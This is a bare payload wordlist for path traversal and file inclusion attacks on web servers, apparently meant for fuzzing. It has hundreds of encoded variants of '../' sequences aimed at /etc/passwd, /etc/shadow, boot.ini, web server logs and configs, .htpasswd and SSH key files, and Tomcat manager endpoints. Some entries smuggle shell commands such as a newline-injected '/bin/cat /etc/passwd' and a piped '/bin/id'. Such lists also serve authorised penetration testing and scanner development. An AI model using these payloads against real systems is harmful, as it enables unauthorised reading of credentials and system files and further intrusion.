_config.php
…..\\\…..\\\…..\\\
.../.../.../.../.../
../_config.php
../_config.php%00
../../../../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../../../../../../../../etc/shadow%00
../../../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../boot.ini
../../../../../../../../../../../../boot.ini%00
../../../../../../../../../../../../etc/hosts
../../../../../../../../../../../../etc/hosts%00
../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../etc/shadow
../../../../../../../../../../../../etc/shadow%00
../../../../../../../../../../../../localstart.asp
../../../../../../../../../../../../localstart.asp%00
../../../../../../../../../../../boot.ini
../../../../../../../../../../../boot.ini%00
../../../../../../../../../../../boot.ini%00.html
../../../../../../../../../../../boot.ini%00.jpg
../../../../../../../../../../../etc/passwd
../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../etc/passwd%00.html
../../../../../../../../../../../etc/passwd%00.jpg
../../../../../../../../../../etc/passwd
../../../../../../../../../../etc/passwd%00
../../../../../../../../../../etc/passwd^^
../../../../../../../../../../etc/shadow
../../../../../../../../../../etc/shadow^^
../../../../../../../../../etc/passwd
../../../../../../../../../etc/passwd%00
../../../../../../../../%2A
../../../../../../../../bin/id|
../../../../../../../../conf/server.xml
../../../../../../../../etc/passwd
../../../../../../../../etc/passwd%00
../../../../../../../dev
../../../../../../../etc/httpd/logs/acces_log
../../../../../../../etc/httpd/logs/acces.log
../../../../../../../etc/httpd/logs/error_log
../../../../../../../etc/httpd/logs/error.log
../../../../../../../etc/passwd
../../../../../../../etc/passwd%00
../../../../../../../usr/local/apache/logs/access_ log
../../../../../../../usr/local/apache/logs/access. log
../../../../../../../usr/local/apache/logs/error_l og
../../../../../../../usr/local/apache/logs/error.l og
../../../../../../../var/log/access_log
../../../../../../../var/log/access.log
../../../../../../../var/log/apache/access_log
../../../../../../../var/log/apache/access.log
../../../../../../../var/log/apache/error_log
../../../../../../../var/log/apache/error.log
../../../../../../../var/log/apache2/access_log
../../../../../../../var/log/apache2/access.log
../../../../../../../var/log/apache2/error_log
../../../../../../../var/log/apache2/error.log
../../../../../../../var/log/error_log
../../../../../../../var/log/error.log
../../../../../../../var/www/logs/access_log
../../../../../../../var/www/logs/access.log
../../../../../../../var/www/logs/error_log
../../../../../../../var/www/logs/error.log
../../../../../../etc/passwd
../../../../../../etc/passwd&=%3C%3C%3C%3C
../../../../../../etc/passwd%00
../../../../../apache/logs/access.log
../../../../../apache/logs/error.log
../../../../../etc/httpd/logs/access_log
../../../../../etc/httpd/logs/access.log
../../../../../etc/httpd/logs/error_log
../../../../../etc/httpd/logs/error.log
../../../../../etc/passwd
../../../../../etc/passwd%00
../../../../../logs/access.log
../../../../../logs/error.log
../../../../../usr/local/apache/logs/access_log
../../../../../usr/local/apache/logs/access.log
../../../../../usr/local/apache/logs/error_log
../../../../../usr/local/apache/logs/error.log
../../../../../var/log/access_log
../../../../../var/log/apache/access_log
../../../../../var/log/apache/access.log
../../../../../var/log/apache/error_log
../../../../../var/log/apache/error.log
../../../../../var/log/error_log
../../../../../var/log/httpd/access_log
../../../../../var/log/httpd/error_log
../../../../../var/www/logs/access.log
../../../../../var/www/logs/error_log
../../../../../var/www/logs/error.log
../../../../apache/logs/access.log
../../../../apache/logs/error.log
../../../../etc/passwd
../../../../etc/passwd%00
../../../../logs/access.log
../../../../logs/error.log
../../../../pswd
../../../administrator/inbox
../../../apache/logs/access.log
../../../apache/logs/error.log
../../../etc/passwd
../../../etc/passwd%00
../../../logs/access.log
../../../logs/error.log
../../apache/logs/access.log
../../apache/logs/error.log
../../boot.ini
../../etc/passwd
../../etc/passwd%00
../../logs/access.log
../../logs/error.log
../../var/www/logs/access_log
../../windows/win.ini
../.htpasswd
../.pass
../.passwd
..//..//..//..//..//boot.ini
../apache/logs/access.log
../apache/logs/error.log
../config.asp
../config.inc.php
../config.js
../config.php
../etc/passwd
../etc/passwd%00
../install.php
../logs/access.log
../logs/error.log
../users.db.php
..\../..\../..\../..\../..\../..\../boot.ini
..\../..\../..\../..\../..\../..\../etc/passwd
..\../..\../..\../..\../..\../..\../etc/shadow
..\../..\../..\../..\../boot.ini
..\../..\../boot.ini
..\..\..\..\..\..\..\..\..\..\boot.ini
..\..\..\..\..\..\..\..\..\..\boot.ini%00
..\..\..\..\..\..\..\..\..\..\etc\passwd
..\..\..\..\..\..\..\..\..\..\etc\passwd%00
..\..\..\..\..\..\..\..\..\..\etc\shadow
..\..\..\..\..\..\..\..\..\..\etc\shadow%00
..\..\..\..\..\..\winnt\win.ini
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow
..%2F..%2F..%2F%2F..%2F..%2F%2Fvar%2Fnamed
..%2F..%2F..%2F%2F..%2F..%2Fetc/passwd
..%2F..%2F..%2F%2F..%2F..%2Fetc/shadow
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/boot.ini
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fshadow%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2fetc2fhttpd2flogs2facces_log
..2f..2f..2f..2f..2f..2f..2fetc2fhttpd2flogs2facces.log
..2f..2f..2f..2f..2f..2f..2fetc2fhttpd2flogs2ferror_log
..2f..2f..2f..2f..2f..2f..2fetc2fhttpd2flogs2ferror.log
..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2fusr2flocal2fapache2flogs2faccess_ log
..2f..2f..2f..2f..2f..2f..2fusr2flocal2fapache2flogs2faccess. log
..2f..2f..2f..2f..2f..2f..2fusr2flocal2fapache2flogs2ferror_l og
..2f..2f..2f..2f..2f..2f..2fusr2flocal2fapache2flogs2ferror.l og
..2f..2f..2f..2f..2f..2f..2fvar2flog2faccess_log
..2f..2f..2f..2f..2f..2f..2fvar2flog2faccess.log
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache22faccess_log
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache22faccess.log
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache22ferror_log
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache22ferror.log
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache2faccess_log
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache2faccess.log
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache2ferror_log
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache2ferror.log
..2f..2f..2f..2f..2f..2f..2fvar2flog2ferror_log
..2f..2f..2f..2f..2f..2f..2fvar2flog2ferror.log
..2f..2f..2f..2f..2f..2f..2fvar2fwww2flogs2faccess_log
..2f..2f..2f..2f..2f..2f..2fvar2fwww2flogs2faccess.log
..2f..2f..2f..2f..2f..2f..2fvar2fwww2flogs2ferror_log
..2f..2f..2f..2f..2f..2f..2fvar2fwww2flogs2ferror.log
..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2fapache2flogs2faccess.log
..2f..2f..2fapache2flogs2ferror.log
..2f..2f..2fetc2fpasswd
..2f..2f..2fetc2fpasswd%00
..2f..2fapache2flogs2faccess.log
..2f..2fapache2flogs2ferror.log
..2f..2fetc2fpasswd
..2f..2fetc2fpasswd%00
..2fapache2flogs2faccess.log
..2fapache2flogs2ferror.log
..2fetc2fpasswd
..2fetc2fpasswd%00
./././././././././././boot.ini
./././././././././././etc/passwd
./././././././././././etc/shadow
.\\./.\\./.\\./.\\./.\\./.\\./boot.ini
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow
.bash_history
.bash_profile
.bashrc
.cshrc
.forward
.htaccess
.htpasswd
.httpd.conf
.logout
.meta
.netrc
.pass
.passwd
.profile
.rhosts
.sh_history
.shosts
.ssh/authorized_keys
.web
.Xauthority
\…..\\\…..\\\…..\\\
\..\..\..\..\..\..\..\..\..\..\boot.ini
\..\..\..\..\..\..\..\..\..\..\etc\passwd
\..\..\..\..\..\..\..\..\..\..\etc\passwd%00
\..\..\..\..\..\..\..\..\..\..\etc\shadow
\..\..\..\..\..\..\..\..\..\..\etc\shadow%00
\\&apos;/bin/cat%20/etc/passwd\\&apos;
\\&apos;/bin/cat%20/etc/shadow\\&apos;
\&apos;/bin/cat%20/etc/passwd\\&apos;
\&apos;/bin/cat%20/etc/shadow\\&apos;
%00../../../../../../etc/passwd
%00../../../../../../etc/shadow
%00/etc/passwd%00
%00/etc/shadow%00
%0a/bin/cat%20/etc/passwd
%0a/bin/cat%20/etc/shadow
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%    25%5c..%25%5c..%255cboot.ini
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%  25%5c..%25%5c..%00
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
=3D “/..” . “%2f..
~bin
~ftp
~nobody
~root
access_log
add
admin/access_log
admin/install.php
apache.conf
apache/logs/access_log
apache/logs/access.log
apache/logs/access.log 
apache/logs/error_log
apache/logs/error.log
apache/logs/error.log 
apache\php\php.ini
apache2/logs/access_log
apache2/logs/access.log
apache2/logs/error_log
apache2/logs/error.log
application.conf
balancer
bin/php.ini
blacklist.conf
boot/grub/grub.conf
C:/boot.ini
C:/inetpub/ftproot/
C:/inetpub/wwwroot/global.asa
c:\apache\logs\access.log
c:\apache\logs\error.log
c:\AppServ\MySQL
C:\boot.ini
C:\inetpub\wwwroot\global.asa
c:\inetpub\wwwroot\index.asp
C:\Program Files\
c:\Program Files\Apache Group\Apache\logs\access.log
c:\Program Files\Apache Group\Apache\logs\error.log
c:\System32\Inetsrv\metabase.xml
c:WINDOWS/system32/
cgi
cgi-bin
cgi-pub
cgi-script
conf/
conf/server.xml/
config.asp
config.inc.php
config.js
config.php
core/config.php
d:\AppServ\MySQL
D:\Program Files\
d:\System32\Inetsrv\metabase.xml
data.php
database.asp
database.js
database.php
dav
db.php
dbase.php a
deploy
doxygen.conf
dummy
en.conf
error
error_log
etc/apache/apache.conf
etc/apache/conf/httpd.conf
etc/apache/httpd.conf
etc/apache2/apache2.conf
etc/apache2/conf/httpd.conf
etc/apache2/httpd.conf
etc/apache2/sites-available/default
etc/apache2/vhosts.d/default_vhost.include
etc/apt/sources.list
etc/chrootUsers
etc/crontab
etc/default/passwd
etc/defaultdomain
etc/defaultrouter
etc/fstab
etc/ftpchroot
etc/ftphosts
etc/group
etc/hostname.bge
etc/hostname.ce0
etc/hostname.ce1
etc/hostname.ce2
etc/hostname.ce3
etc/hostname.dcelx0
etc/hostname.dcelx1
etc/hostname.dcelx2
etc/hostname.dcelx3
etc/hostname.dmfe0
etc/hostname.dmfe1
etc/hostname.dmfe2
etc/hostname.dmfe3
etc/hostname.dnet0
etc/hostname.dnet1
etc/hostname.dnet2
etc/hostname.dnet3
etc/hostname.ecn0
etc/hostname.ecn1
etc/hostname.ecn2
etc/hostname.ecn3
etc/hostname.elx0
etc/hostname.elx1
etc/hostname.elx2
etc/hostname.elx3
etc/hostname.elxl0
etc/hostname.elxl1
etc/hostname.elxl2
etc/hostname.elxl3
etc/hostname.eri0
etc/hostname.eri1
etc/hostname.eri2
etc/hostname.eri3
etc/hostname.ge0
etc/hostname.ge1
etc/hostname.ge2
etc/hostname.ge3
etc/hostname.hme0
etc/hostname.hme1
etc/hostname.hme2
etc/hostname.hme3
etc/hostname.ieef0
etc/hostname.ieef1
etc/hostname.ieef2
etc/hostname.ieef3
etc/hostname.iprb0
etc/hostname.iprb1
etc/hostname.iprb2
etc/hostname.iprb3
etc/hostname.le0
etc/hostname.le1
etc/hostname.le2
etc/hostname.le3
etc/hostname.lo
etc/hostname.pcn0
etc/hostname.pcn1
etc/hostname.pcn2
etc/hostname.pcn3
etc/hostname.qfe0
etc/hostname.qfe1
etc/hostname.qfe2
etc/hostname.qfe3
etc/hostname.spwr0
etc/hostname.spwr1
etc/hostname.spwr2
etc/hostname.spwr3
etc/hosts
etc/hosts.allow
etc/hosts.deny
etc/hosts.equiv
etc/http/conf/httpd.conf
etc/http/httpd.conf
etc/httpd.conf
etc/httpd/conf.d/php.conf
etc/httpd/conf.d/squirrelmail.conf
etc/httpd/conf.d/ssl.conf
etc/httpd/conf/httpd.conf
etc/httpd/httpd.conf
etc/httpd/logs/acces_log
etc/httpd/logs/acces_log 
etc/httpd/logs/acces.log
etc/httpd/logs/acces.log 
etc/httpd/logs/access_log
etc/httpd/logs/access.log
etc/httpd/logs/error_log
etc/httpd/logs/error_log 
etc/httpd/logs/error.log
etc/httpd/logs/error.log 
etc/httpd/php.ini
etc/inetd.conf
etc/init.d/apache
etc/init.d/apache2
etc/issue
etc/logrotate.d/ftp
etc/logrotate.d/httpd
etc/logrotate.d/proftpd
etc/logrotate.d/vsftpd.log
etc/mail/access
etc/mailman/mm_cfg.py
etc/make.conf
etc/master.passwd
etc/motd
etc/my.cnf
etc/mysql/my.cnf
etc/netconfig
etc/nsswitch.conf
etc/opt/ipf/ipf.conf
etc/opt/ipf/ipnat.conf
etc/passwd
etc/passwd%00
etc/php.d/dom.ini
etc/php.d/gd.ini
etc/php.d/imap.ini
etc/php.d/json.ini
etc/php.d/ldap.ini
etc/php.d/mbstring.ini
etc/php.d/mysql.ini
etc/php.d/mysqli.ini
etc/php.d/odbc.ini
etc/php.d/pdo_mysql.ini
etc/php.d/pdo_odbc.ini
etc/php.d/pdo_pgsql.ini
etc/php.d/pdo_sqlite.ini
etc/php.d/pdo.ini
etc/php.d/pgsql.ini
etc/php.d/xmlreader.ini
etc/php.d/xmlwriter.ini
etc/php.d/xsl.ini
etc/php.d/zip.ini
etc/php.ini
etc/php/apache/php.ini
etc/php/apache2/php.ini
etc/php/cgi/php.ini
etc/php/php.ini
etc/php/php4/php.ini
etc/php4.4/fcgi/php.ini
etc/php4/apache/php.ini
etc/php4/apache2/php.ini
etc/php4/cgi/php.ini
etc/php5/apache/php.ini
etc/php5/apache2/php.ini
etc/php5/cgi/php.ini
etc/postfix/mydomains
etc/proftp.conf
etc/proftpd/modules.conf
etc/protpd/proftpd.conf
etc/pure-ftpd.conf
etc/pure-ftpd/pure-ftpd.conf
etc/pure-ftpd/pure-ftpd.pdb
etc/pure-ftpd/pureftpd.pdb
etc/pureftpd.passwd
etc/pureftpd.pdb
etc/release
etc/resolv.conf
etc/rpc
etc/security/environ
etc/security/failedlogin
etc/security/group
etc/security/lastlog
etc/security/limits
etc/security/passwd
etc/security/user
etc/shadow
etc/shadow%00
etc/ssh/sshd_config
etc/sudoers
etc/syslog.conf
etc/syslogd.conf
etc/system
etc/updatedb.conf
etc/utmp
etc/vfstab
etc/vhcs2/proftpd/proftpd.conf
etc/vsftpd.chroot_list
etc/vsftpd.conf
etc/vsftpd/vsftpd.conf
etc/wtmp
etc/wu-ftpd/ftpaccess
etc/wu-ftpd/ftphosts
etc/wu-ftpd/ftpusers
example.conf
examples
examples/../manager/html
examples/%252e%252e/manager/html
examples/%2e%2e/manager/html
examples/jsp/index.html
examples/jsp/snp/snoop.jsp
examples/jsp/source.jsp
examples/servlet/default/jsp/snp/snoop.jsp
examples/servlet/default/jsp/source.jsp
examples/servlet/HelloWorldExample
examples/servlet/org.apache.catalina.INVOKER.HelloWorldExample
examples/servlet/org.apache.catalina.INVOKER.SnoopServlet
examples/servlet/org.apache.catalina.INVOKER.TroubleShooter
examples/servlet/org.apache.catalina.servlets.DefaultServlet/jsp/snp/snoop.jsp
examples/servlet/org.apache.catalina.servlets.DefaultServlet/jsp/source.jsp
examples/servlet/org.apache.catalina.servlets.WebdavServlet/jsp/snp/snoop.jsp
examples/servlet/org.apache.catalina.servlets.WebdavServlet/jsp/source.jsp
examples/servlet/snoop
examples/servlet/SnoopServlet
examples/servlet/TroubleShooter
examples/servlets/index.html
fsfs.conf
globals_double_quotes.conf
globals_single_quotes.conf
home/apache/conf/httpd.conf
home/apache/httpd.conf
home\bin\stable\apache\php.ini
home2\bin\stable\apache\php.ini
host-manager
host-manager/add
host-manager/host-manager.xml
host-manager/html/*
host-manager/list
host-manager/remove
host-manager/start
host-manager/stop
htdocs
html/*
httpd
httpd-vhosts.conf
httpd.conf
httpd.pid
icons
index.html
install
install.php
interwiki.conf
j4p
jmxproxy/*
jsp-examples
L21hc3Rlci5wYXNzd2Q=
L2V0Yy9tYXN0ZXIucGFzc3dk
L2V0Yy9wYXNzd2Q=
L2V0Yy9wYXNzd2QlMDA=
lang_english.conf
lang_german.conf
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3NoYWRvdyUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vZXRjL3Bhc3N3ZA==
Li4vZXRjL3Bhc3N3ZCUwMA==
lighttpd.conf
list
local.conf
log/miscDir/accesslog
logs
logs/access_log
logs/access.log
logs/error_log
logs/error.log
logs/pure-ftpd.log
manager
manager/deploy
manager/deploy?path=foo
manager/html
manager/html/
manager/html/*
manager/install
manager/jmxproxy
manager/jmxproxy/*
manager/list
manager/manager.xml
manager/reload
manager/remove
manager/resources
manager/roles
manager/save
manager/serverinfo
manager/sessions
manager/start
manager/status
manager/status.xsd
manager/status/*
manager/stop
manager/text
manager/undeploy
manual
master.passwd
member/.htpasswd
members/.htpasswd
Module.conf
modules.conf
NetServer\bin\stable\apache\php.ini
nginx.conf
opt/apache/conf/httpd.conf
opt/apache2/conf/httpd.conf
opt/lampp/logs/access_log
opt/lampp/logs/access.log
opt/lampp/logs/error_log
opt/lampp/logs/error.log
opt/xampp/etc/php.ini
opt/xampp/logs/access_log
opt/xampp/logs/access.log
opt/xampp/logs/error_log
opt/xampp/logs/error.log
pass.dat
passwd
passwd.dat
phf
php-fpm.conf
PHP\php.ini
php4\php.ini
php5\php.ini
phpMyAdmin-http.conf
printenv
private/etc/httpd/httpd.conf
private/etc/httpd/httpd.conf.default
proc/cpuinfo
proc/interrupts
proc/loadavg
proc/meminfo
proc/mounts
proc/net/arp
proc/net/dev
proc/net/route
proc/net/tcp
proc/partitions
proc/self/cmdline
proc/self/envron
proc/version
proftpd.conf
